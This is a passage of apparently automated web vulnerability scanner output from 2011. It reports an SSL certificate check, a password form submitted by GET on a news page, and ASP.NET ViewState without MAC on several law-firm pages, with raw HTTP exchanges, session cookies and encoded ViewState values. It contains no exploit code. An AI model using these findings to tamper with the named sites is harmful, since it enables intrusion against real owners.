Valid to:  Wed Aug 02 18:59:59 CDT 2028
13.9. https://www.pillsburylaw.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.pillsburylaw.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.pillsburylaw.com
Issued by:  UTN-USERFirst-Hardware
Valid from:  Sun Feb 08 18:00:00 CST 2009
Valid to:  Sun Feb 09 17:59:59 CST 2014

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  AddTrust External CA Root
Valid from:  Tue Jun 07 03:09:10 CDT 2005
Valid to:  Sat May 30 05:48:38 CDT 2020

Certificate chain #2

Issued to:  AddTrust External CA Root
Issued by:  AddTrust External CA Root
Valid from:  Tue May 30 05:48:38 CDT 2000
Valid to:  Sat May 30 05:48:38 CDT 2020
14. Password field submitted using GET method  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.boston.com
Path:   /business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/

Issue detail

The page contains a form with the following action URL, which is submitted using the GET method:The form contains the following password field:

Issue background

The application uses the GET method to submit passwords, which are transmitted within the query string of the requested URL. Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing passords into the URL increases the risk that they will be captured by an attacker.

Issue remediation

All forms submitting passwords should use the POST method. To achieve this, you should specify the method attribute of the FORM tag as method="POST". It may also be necessary to modify the corresponding server-side form handler to ensure that submitted passwords are properly retrieved from the message body, rather than the URL.

Request

GET /business/globe/articles/2006/07/22/convention_center_gets_24m_settlement/ HTTP/1.1
Host: www.boston.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:55:06 GMT
Server: Apache/2.2.17 (Linux/SUSE) PHP/5.3.5
X-Powered-By: PHP/5.3.5
Set-Cookie: bcpage=0;expires=Fri, 15-Apr-2016 16:55:03 GMT;path=/;domain=boston.com;
Accept-Ranges: bytes
Served-By: nefertiti
Content-Type: text/html
Connection: close
Set-Cookie: bcpage=0;expires=Fri, 15-Apr-2016 16:55:03 GMT;path=/;domain=boston.com;
Content-Length: 37920

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html lang="en">
<head>
<title>Convention center gets $24m settlement - The Boston Globe</titl
...[SNIP]...
</div>
<form id="lgForm" onsubmit="return false">
<table cellspacing="0" style="margin: 5px; width: 98%;height:200px" id="logtable">
...[SNIP]...
<td><input type="password" style="" maxlength="50" name="pass" id="pass" /></td>
...[SNIP]...
15. ASP.NET ViewState without MAC enabled  previous  next
There are 4 instances of this issue:

Issue description

The ViewState is a mechanism built in to the ASP.NET platform for persisting elements of the user interface and other data across successive requests. The data to be persisted is serialised by the server and transmitted via a hidden form field. When it is POSTed back to the server, the ViewState parameter is deserialised and the data is retrieved.

By default, the serialised value is signed by the server to prevent tampering by the user; however, this behaviour can be disabled by setting the Page.EnableViewStateMac property to false. If this is done, then an attacker can modify the contents of the ViewState and cause arbitrary data to be deserialised and processed by the server. If the ViewState contains any items that are critical to the server's processing of the request, then this may result in a security exposure.

You should review the contents of the deserialised ViewState to determine whether it contains any critical items that can be manipulated to attack the application.

Issue remediation

There is no good reason to disable the default ASP.NET behaviour in which the ViewState is signed to prevent tampering. To ensure that this occurs, you should set the Page.EnableViewStateMac property to true on any pages where the ViewState is not currently signed.

15.1. http://www.howardrice.com/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /

Request

GET / HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Howard+Rice+Nemerovski+Canady+Falk+%26+Rabkin&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 39373
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Set-Cookie: ASP.NET_SessionId=pe3xaq55hraylnfzs1r5cd45; path=/; HttpOnly
Date: Thu, 12 May 2011 16:09:18 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>
   Howard Rice
<
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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ZSBiZWxpZXZlIHRoYXQgZXZlcnkgdGltZSB5b3UgZW50cnVzdCB1cyB3aXRoIGNvbXBsZXggZGlzcHV0ZXMgb3Igc29waGlzdGljYXRlZCB0cmFuc2FjdGlvbnMsIHlvdSBkZXNlcnZlIGxlZ2FsIGV4Y2VsbGVuY2UgYW5kIGltcGVjY2FibGUgc2VydmljZS4mbmJzcDtGb2N1cywgZGVlcCBpbmR1c3RyeSBrbm93bGVkZ2UgYW5kIGFuIHVud2F2ZXJpbmcgY29tbWl0bWVudCB0byBhY2hpZXZpbmcgb3VyIGNsaWVudHMnIHN0cmF0ZWdpYyBvYmplY3RpdmVzIC0gdGhpcyBpcyB3aGF0IHlvdSBjYW4gZXhwZWN0IGZyb20gSG93YXJkIFJpY2UuPC9kaXY+ZAIJDxYCHwQCAxYGZg9kFgRmDxQrAgYFLWh0dHA6Ly82NS4xNy4yNDUuNDMvQ2hhcmxlcy1TY2h3YWItQ2FzZS1TdHVkeQUBMGQFFjEwNTBfRmVhdHVyZUltYWdlMS5qcGcF3wE8cD48cD48c3Ryb25nPjMwIFllYXJzIG9mIEFkdmlzaW5nIGEgTGVhZGluZyBQcm92aWRlciBvZiBGaW5hbmNpYWwgU2VydmljZXM8L3N0cm9uZz48L3A+PGJyPg0KPHA+Rm9yIDMwIHllYXJzLCBIb3dhcmQgUmljZSBoYXMgYmVlbiBwcmltYXJ5IG91dHNpZGUgbGVnYWwgY291bnNlbCB0byBUaGUgQ2hhcmxlcyBTY2h3YWIgQ29ycG9yYXRpb24gYW5kIGl0cyBhZmZpbGlhdGVzLjwvcD48L3A+BS1odHRwOi8vNjUuMTcuMjQ1LjQzL0NoYXJsZXMtU2Nod2FiLUNhc2UtU3R1ZHlkAgIPFQIBMBsxMDUwX0ZlYXR1cmVCYWNrR3JvdW5kMS5qcGdkAgEPZBYEZg8VBjtodHRwOi8vNjUuMTcuMjQ1LjQzL1JlZGVmaW5pbmctdGhlLURpZ2l0YWwtV29ybGQtQ2FzZS1TdHVkeQExCHNlbGVjdGVkFjEwNTBfRmVhdHVyZUltYWdlMi5qcGeKATxwPjxwPjxzdHJvbmc+UmVkZWZpbmluZyB0aGUgRGlnaXRhbCBXb3JsZDwvc3Ryb25nPjwvcD48YnI+DQo8cD4yMDEwIHdhcyBhIGJhbm5lciB5ZWFyIGZvciBIb3dhcmQgUmljZSdzIEFwcGVsbGF0ZSBQcmFjdGljZSBHcm91cC48L3A+PC9wPjtodHRwOi8vNjUuMTcuMjQ1LjQzL1JlZGVmaW5pbmctdGhlLURpZ2l0YWwtV29ybGQtQ2FzZS1TdHVkeWQCAg8VAgExGzEwNTBfRmVhdHVyZUJhY2tHcm91bmQyLmpwZ2QCAg9kFgRmDxQrAgYFMGh0dHA6Ly82NS4xNy4yNDUuNDMvRGF2aWQtYW5kLUdvbGlhdGgtQ2FzZS1TdHVkeQUBMmQFFjEwNTBfRmVhdHVyZUltYWdlMy5qcGcFiQI8cD48cD48c3Ryb25nPkRhdmlkIGFuZCBHb2xpYXRoOiBCYXR0bGUgaW4gdGhlIFZpZGVvZ2FtZSBBY2Nlc3NvcmllcyBNYXJrZXQ8L3N0cm9uZz48L3A+PGJyPg0KPHA+SW4gdGhlIHdvcmxkIG9mIGRpZ2l0YWwgZ2FtaW5nLCB0aGVyZSBhcmUgZmV3IGdpYW50cyBtb3JlIGZvcm1pZGFibGUgdGhhbiBNaWNyb3NvZnQuIEhvd2FyZCBSaWNlIGlzIGN1cnJlbnRseSByZXByZXNlbnRpbmcgRGF0ZWwgRGVzaWduICZhbXA7IERldmVsb3BtZW50IEx0ZC4uLjwvcD48L3A+BTBodHRwOi8vNjUuMTcuMjQ1LjQzL0RhdmlkLWFuZC1Hb2xpYXRoLUNhc2UtU3R1ZHlkAgIPFQIBMhsxMDUwX0ZlYXR1cmVCYWNrR3JvdW5kMy5qcGdkAg0PDxYCHwEFC1JlY2VudCBOZXdzZGQCDw8WAh8EAgMWBgIBD2QWAmYPFQgBMB5odHRwOi8vd3d3Lmhvd2FyZHJpY2UuY29tLzcyMjUENjg1NQ4xOF9yZW5lc2FzLmpwZx5odHRwOi8vd3d3Lmhvd2FyZHJpY2UuY29tLzcyMjULUmVjZW50IE5ld3NySG93YXJkIFJpY2UgUmVwcmVzZW50cyBSZW5lc2FzIEVsZWN0cm9uaWNzIGluICQ1MyBNaWxsaW9uIFNhbGUgb2YgU2VtaWNvbmR1Y3RvciBQbGFudCB0byBUZWxlZnVua2VuIFNlbWljb25kdWN0b3JzAGQCAg9kFgJmDxUIATEeaHR0cDovL3d3dy5ob3dhcmRyaWNlLmNvbS83MjIzBDY4NTURSFBfY291cnRob3VzZS5qcGceaHR0cDovL3d3dy5ob3dhcmRyaWNlLmNvbS83MjIzC1JlY2VudCBOZXdzTFUuUy4gU3VwcmVtZSBDb3VydCBEZW5pZXMgQ2VydGlvcmFyaSBpbiBFbWluZW0gRGlnaXRhbCBEb3dubG9hZCBSb3lhbHR5IENhc2UAZAIDD2QWAmYPFQgBMh5odHRwOi8vd3d3Lmhvd2FyZHJpY2UuY29tLzcyMTEENjg1NRBIUENsYXlBd2FyZHMuanBnHmh0dHA6Ly93d3cuaG93YXJkcmljZS5jb20vNzIxMQtSZWNlbnQgTmV3c0FIb3dhcmQgUmljZeKAmXMgQXBwZWxsYXRlIFByYWN0aWNlIFJlY2VpdmVzIFN0YXRld2lkZSBSZWNvZ25pdGlvbgBkAhEPFgIfBAIDFgYCAQ9kFgJmDxUBATBkAgIPZBYCZg8VAQExZAIDD2QWAmYPFQEBMmQCEw8WAh8BZWQCIQ8PFgIfAwUHU2l0ZW1hcGRkAiMPDxYCHwMFBDY4NjJkZAIlDw8WAh8DBQZBbHVtbmlkZAInDw8WAh8DBQ1MZWdhbC1Ob3RpY2VzZGQCKQ8PFgIfAwUENjg2NmRkAisPDxYCHwMFCkNvbnRhY3QtVXNkZAItD2QWAgIBDw8WAh8BBVQmIzE2OTsgMjAxMSBIb3dhcmQgUmljZSBOZW1lcm92c2tpIENhbmFkeSBGYWxrICZhbXA7IFJhYmtpbiBQQy4gQWxsIHJpZ2h0cyByZXNlcnZlZC5kZGQ=" />
...[SNIP]...
15.2. http://www.howardrice.com/6862  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /6862

Request

GET /6862 HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/
Cookie: currentLang=en-US; ASP.NET_SessionId=awerfjvfyai4kafq43zhuc45; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.2.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33063
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Date: Thu, 12 May 2011 16:12:26 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="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" />
...[SNIP]...
15.3. http://www.howardrice.com/Alumni  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.howardrice.com
Path:   /Alumni

Request

GET /Alumni HTTP/1.1
Host: www.howardrice.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.howardrice.com/
Cookie: currentLang=en-US; ASP.NET_SessionId=awerfjvfyai4kafq43zhuc45; __utma=146441517.1620441990.1305216561.1305216561.1305216561.1; __utmb=146441517.3.10.1305216561; __utmc=146441517; __utmz=146441517.1305216561.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Howard%20Rice%20Nemerovski%20Canady%20Falk%20%26%20Rabkin; __utmv=

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 32212
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: currentLang=en-US; path=/
Date: Thu, 12 May 2011 16:13:30 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><titl
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwULLTEzNTk0OTYwOTUPZBYCZg9kFghmD2QWBAIBDxYCHgdjb250ZW50ZGQCAg8WAh8AZGQCAQ9kFggCAQ9kFgQCBw8PFgIeB1Zpc2libGVoZGQCHQ8PFgIeC05hdmlnYXRlVXJsBQQ2ODY2ZGQCAw8WAh4LXyFJdGVtQ291bnQCBhYMAgEPZBYGZg8VAQEwZAIBDw8WBB4EVGV4dAUGUGVvcGxlHwIFEkhvd2FyZC1SaWNlLVBlb3BsZWRkAgMPFgQfAwL/////Dx8BaGQCAw9kFgZmDxUBATFkAgEPDxYEHwQFFlByYWN0aWNlcyAmIEluZHVzdHJpZXMfAgUVUHJhY3RpY2VzLS1JbmR1c3RyaWVzZGQCAw8WAh8DAgQWCAIBD2QWAgIBDw8WBB8EBQlQcmFjdGljZXMfAgUENjExOGRkAgIPZBYCAgEPDxYEHwQFCkluZHVzdHJpZXMfAgUENjExN2RkAgMPZBYCAgEPDxYEHwQFFlJlcHJlc2VudGF0aXZlIENsaWVudHMfAgUENjExNmRkAgQPZBYCAgEPDxYEHwQFDENhc2UgU3R1ZGllcx8CBQxDYXNlLVN0dWRpZXNkZAIFD2QWBmYPFQEBMmQCAQ8PFgQfBAUTTmV3cyAmIFB1YmxpY2F0aW9ucx8CBRJOZXdzLS1QdWJsaWNhdGlvbnNkZAIDDxYCHwMCBxYOAgEPZBYCAgEPDxYEHwQFDlByZXNzIFJlbGVhc2VzHwIFDlByZXNzLVJlbGVhc2VzZGQCAg9kFgICAQ8PFgQfBAUGQWxlcnRzHwIFBkFsZXJ0c2RkAgMPZBYCAgEPDxYEHwQFCEFydGljbGVzHwIFCEFydGljbGVzZGQCBA9kFgICAQ8PFgQfBAUUQXdhcmRzICYgUmVjb2duaXRpb24fAgUTQXdhcmRzLS1SZWNvZ25pdGlvbmRkAgUPZBYCAgEPDxYEHwQFElNpZ25pZmljYW50IEJyaWVmcx8CBRJTaWduaWZpY2FudC1CcmllZnNkZAIGD2QWAgIBDw8WBB8EBQtJbiBUaGUgTmV3cx8CBQtJbi1UaGUtTmV3c2RkAgcPZBYCAgEPDxYEHwQFBUJsb2dzHwIFBUJsb2dzZGQCBw9kFgZmDxUBATNkAgEPDxYEHwQFBkV2ZW50cx8CBQZFdmVudHNkZAIDDxYEHwMC/////w8fAWhkAgkPZBYGZg8VAQE0ZAIBDw8WBB8EBQhPdXIgRmlybR8CBQQ2MDk0ZGQCAw8WAh8DAgYWDAIBD2QWAgIBDw8WBB8EBRVMb2NhdGlvbiAmIERpcmVjdGlvbnMfAgUVTG9jYXRpb25zLS1EaXJlY3Rpb25zZGQCAg9kFgICAQ8PFgQfBAUJRGl2ZXJzaXR5HwIFCURpdmVyc2l0eWRkAgMPZBYCAgEPDxYEHwQFFVBybyBCb25vICYgQ29tbXVuaXR5IB8CBRdQcm8tQm9uby1hbmQtQ29tbXVuaXR5LWRkAgQPZBYCAgEPDxYEHwQFFEF3YXJkcyAmIFJlY29nbml0aW9uHwIFBDY4ODFkZAIFD2QWAgIBDw8WBB8EBQ9GaXJtIExlYWRlcnNoaXAfAgUENjg4MGRkAgYPZBYCAgEPDxYEHwQFDEZpcm1seSBHcmVlbh8CBRtIb3dhcmQtUmljZS1HcmVlbi1TdGF0ZW1lbnRkZAILD2QWBmYPFQEBNWQCAQ8PFgQfBAUMV29ya2luZyBIZXJlHwIFBDYwOTNkZAIDDxYCHwMCBRYKAgEPZBYCAgEPDxYEHwQFFEEgVW5pcXVlIEVudmlyb25tZW50HwIFFEEtVW5pcXVlLUVudmlyb25tZW50ZGQCAg9kFgICAQ8PFgQfBAUMTGF3IFN0dWRlbnRzHwIFDExhdy1T